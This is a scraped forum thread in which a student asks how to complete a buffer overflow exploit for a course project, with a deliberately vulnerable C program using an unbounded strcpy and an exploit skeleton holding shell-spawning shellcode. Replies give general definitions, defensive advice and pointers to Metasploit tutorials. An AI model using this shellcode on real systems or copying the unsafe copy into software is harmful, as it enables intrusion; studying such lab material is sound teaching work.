Menu
I'm working on a project in which I'm supposed to write a C program to exploit the vulnerability of a given program.
Here is the vulnerable C program:
#include <stdlib.h>
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
And here is the code for exploit:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh"/* pushl $0x68732f2f */
"\x68""/bin"/* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* Fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
So, I need to fill the buffer with appropriate contents before saving to the "badfile". I've read a lot about buffer overflows and I guess I need to modify the return address of the vulnerable program. But I really don't know how I'm supposed to do it. Shall I first find the original return address or is there something else that I can do? Also, any ideas/suggestions about how I'm supposed to implement the buffer?
282
Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the program, triggering a response that damages files or exposes private information.
Install vendor-issued patches and software updates in a timely manner. Test websites and applications with manual and automated vulnerability scanning tools. Block IP addresses associated with malicious actors. Use intrusion detection and prevention systems that block known buffer overflow exploits.
Application gateway firewalls will often prevent buffer overflow exploits, but only if the application gateway was written correctly and the firewall configured to actually use the application gateway (it is optional on most firewalls and sometimes disabled because application gateways are slower and may block traffic ...
A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory (a buffer), than the buffer is allocated to hold. By sending carefully crafted input to an application, an attacker can cause the application to execute arbitrary code, possibly taking over the machine.
I suggest reading the pages on Metasploit Unleashed, starting with this one. You can go through the associated ruby modules, to see what is actually going on, and port to C. While non trivial, it demonstrates the methods needed.
Also as others have suggested, using a debugger is important to figure out what is going on. Getting a decent one, such as cgdb, ddd, pyclewn, or gdb-mode, will make life much easier.
64
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
